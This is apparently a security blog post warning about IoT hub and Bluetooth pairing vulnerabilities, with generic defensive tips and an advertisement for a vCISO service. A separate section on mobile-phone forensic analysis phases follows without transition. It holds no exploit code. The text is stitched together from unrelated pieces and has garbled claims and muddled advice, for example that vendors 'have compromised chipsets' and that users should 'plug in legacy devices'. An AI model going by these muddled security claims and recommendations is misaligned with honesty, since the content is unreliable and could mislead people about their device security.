Our daily lives are becoming filled with new technologies that make life simple and more organized. The simplicity and combined conveniences could bring a false sense of security. Both IoT and Bluetooth devices are at risk from cyber-attacks.
We all have some type of Bluetooth device connected to our tech. A printer, headset or a smart hub that connects IoT devices in your home or office. Do you have a Bluetooth headset or a Samsung SmartHub, thermostats, doorbells, refrigerators and music services, wireless radios links, time clocks, audio/video streaming devices, IP cameras, smart garage door openers, and network attached storage devices consider reading further.
In the last few weeks some revealing public service notices have been sent out, but for some reason, news outlets are not reporting on them.
First the FBI through its internet cybercrime center (Ic3) warning that cybercriminals actively search for and compromise vulnerable Internet of Things (IoT) devices. Cyber-criminals will use your connected devices as proxies or intermediaries for Internet requests to route malicious traffic for cyber-attacks and computer network exploitation. To add credibility to the notice, recently the SmartThings Hub warning that security holes could allow hackers to break into smart locks, crack into connected cameras and mess around will all manner of network connected devices.
Compromise the hub, and you’ve effectively compromised an entire smart home and potentially the servers it connects back to deliver its smart functions.
The identified vulnerabilities differ in access levels given to the attacker. Many of the vul]nerabilities may be difficult to exploit if they were singular. However, when all 20 of the vulnerabilities are combined, it makes access easier. Most home or small offices that use devices such as this allow access to sensitive data that could be leveraged to give the attacker access to sensitive data or control and even monitor devices.
These IoT devices act as proxy servers and are attractive to cybercriminals because the devices are connected to your network, thereby making it difficult to trace to them. Cybercriminals may use the compromised device’s IP address to engage in intrusion activities, making it difficult to filter regular traffic from malicious traffic.
How to defend against these attacks? Reboot devices regularly, as most malware is stored in memory and removed upon a device reboot. Change default usernames and passwords. Use anti-virus periodically and ensure it is up to date. Ensure all IoT devices are up to date and security patches are incorporated.
Now let’s talk about the vulnerabilities of Bluetooth- So far, Apple, Broadcom, Intel, and Qualcomm have compromised chipsets in their devices. Google, Android, and Linux have yet to confirm the existence of the vulnerability, but then the probability is high that they are also affected.
How do they exploit Bluetooth? Bluetooth utilizes a device pairing key exchange for allowing encrypted communication between devices. So you think this is safe right?
Wrong: A critical vulnerability has been found affecting some Bluetooth implementations that could allow a remote cyber-attacker to utilize a man-in-the-middle position to intercept, or manipulate the data between devices.
The Bluetooth Special Interest Group(SIG) has recently update specifications as a result of these identified vulnerabilities. Now Bluetooth devices will require validation of a public key received as part of the protocol.
We suggest that you plug in legacy devices and update the firmware to minimize the impact on your use and consider strengthening your cybersecurity gateway using intrusion solutions like DiscoverCF.com offers in their vCISO platform. A cybersecurity platform like this can cost less than you pay for Starbucks every day at under USD 50 per month.
FORENSIC ANALYSIS
The forensic process is made in the following phases:
Verification: During this stage, the forensic examiner called on duty takes a careful look at the information logged by the system, by the applications, and by the network devices to be sure the incident effectively occurred.
System description: Once the verification task is successfully completed and the security incident occurred, the forensic examiner has to fill in a detailed system description: the information ranges from the hardware and software system characteristics, the hard disks geometry, its utility, the list of users and other useful information. During this phase, a detailed report of the features of hardware and software of the mobile phone can be obtained and accurately documented
Acquisition of evidence: All data from the mobile phone must be transferred to an external media or to a forensic workstation in order to perform the analysis tasks. This operation is critical because the examiner needs to be sure that only the original data is transferred and taken into account. Paraben´s Device Seizure V. 4.0 for Windows platform is the perfect tool design for forensics motives, which lets us browse the phone’s internal memory. Timeline analysis This is a complete image file list associated with the MAC times info; it is very useful to trace back the system activity; (the timeline file prints out the last time an executable file was run, the last time a file or a directory were created/deleted and it could also prove the presence of scripting activity. In this stage, the forensic analyst has to examine thoroughly the media layers [physical, data, metadata, file system and file name] searching for evidence of suspicious binary installations, files, and directories added, removed and so on. Search string With this deep knowledge of the system, the analyst can now begin searching for specific strings contained inside files to reveal useful information. A list of standard “dirty words” could be very useful to pull out relevant information about the compromise of the system.